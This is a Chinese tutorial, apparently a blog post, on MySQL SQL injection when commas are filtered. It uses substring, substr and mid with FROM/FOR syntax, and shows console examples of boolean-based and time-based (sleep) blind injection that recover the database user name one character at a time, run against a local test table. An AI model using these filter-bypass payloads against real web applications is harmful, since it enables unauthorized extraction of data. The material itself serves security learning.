0x00 概要
不允许 逗号(,) 出现时的注入方法
- substring(str FROM pos)
- substr(str FROM pos)
- mid(str FROM pos)
- 从字符串str的起始位置pos 返回一个子串
0x01 解法
0x01.1 解法一
mysql> select ascii(substring((select user()) from 1));+------------------------------------------+| ascii(substring((select user()) from 1)) |+------------------------------------------+| 114 |+------------------------------------------+1 row in set (0.00 sec)
mysql> select ascii(substring((select user()) from 2));+------------------------------------------+| ascii(substring((select user()) from 2)) |+------------------------------------------+| 111 |+------------------------------------------+1 row in set (0.00 sec)
0x01.2 解法二
mysql> select substring((select user()) from 1 for 1);+------------------------------------------+| substring((select user()) from 1 for 1) |+------------------------------------------+| r |+------------------------------------------+1 row in set (0.00 sec)
mysql> select substring((select user()) from 2 for 1);+------------------------------------------+| substring((select user()) from 2 for 1) |+------------------------------------------+| o |+------------------------------------------+1 row in set (0.00 sec)
0x02 盲注实验
0x02.1 基础数据
// 当前用户mysql> select user();+----------------+| user() |+----------------+| root@localhost |+----------------+1 row in set (0.00 sec)
// 测试数据mysql> select * from test where id = 1;+----+------+------+---------+| id | test | map | content |+----+------+------+---------+| 1 | 1 | NULL | NULL |+----+------+------+---------+1 row in set (0.00 sec)
0x02.2 编码转换
// 第一个字符的ascii码mysql> select ascii(mid(user() from 1));+---------------------------+| ascii(mid(user() from 1)) |+---------------------------+| 114 |+---------------------------+1 row in set (0.00 sec)
// 第二个字符的ascii码mysql> select ascii(mid(user() from 2));+---------------------------+| ascii(mid(user() from 2)) |+---------------------------+| 111 |+---------------------------+1 row in set (0.00 sec)
// 十进制转码mysql> select char(114);+-----------+| char(114) |+-----------+| r |+-----------+1 row in set (0.00 sec)
// 十进制转码mysql> select char(111);+-----------+| char(111) |+-----------+| o |+-----------+1 row in set (0.00 sec)
0x02.3 解法一-布尔盲注查询数据库用户名
substring, substr, mid 这3个函数利用方式都是一样的,所以就只举例一个
// 正确的情况mysql> SELECT * from test where id = 1 and (select ascii(mid(user() from 1))=114);+----+------+------+---------+| id | test | map | content |+----+------+------+---------+| 1 | 1 | NULL | NULL |+----+------+------+---------+1 row in set (0.00 sec)
// 错误的情况mysql> SELECT * from test where id = 1 and (select ascii(mid(user() from 1))=119);Empty set (0.00 sec)
0x02.4 解法一-延时盲注查询数据库用户名
substring, substr, mid 这3个函数利用方式都是一样的,所以就只举例一个
// 正确的情况mysql> SELECT * from test where id = 1 and case when(ascii(substring(user() from 1))=114) then sleep(5) else 0 end;Empty set (5.00 sec)
// 错误的情况mysql> SELECT * from test where id = 1 and case when(ascii(substring(user() from 1))=119) then sleep(5) else 0 end;Empty set (0.00 sec)
0x02.5 解法二-延时盲注查询数据库用户名
substring, substr, mid 这3个函数利用方式都是一样的,所以就只举例一个
// 正确的情况mysql> SELECT * from tdb_goods where goods_id = 1 and case when(substring(user() from 1 for 1)='r') then sleep(5) else 0 end;Empty set (5.00 sec)
// 错误的情况mysql> SELECT * from tdb_goods where goods_id = 1 and case when(substring(user() from 1 for 1)='x') then sleep(5) else 0 end;Empty set (0.00 sec)
若有收获,就点个赞吧
0 人点赞
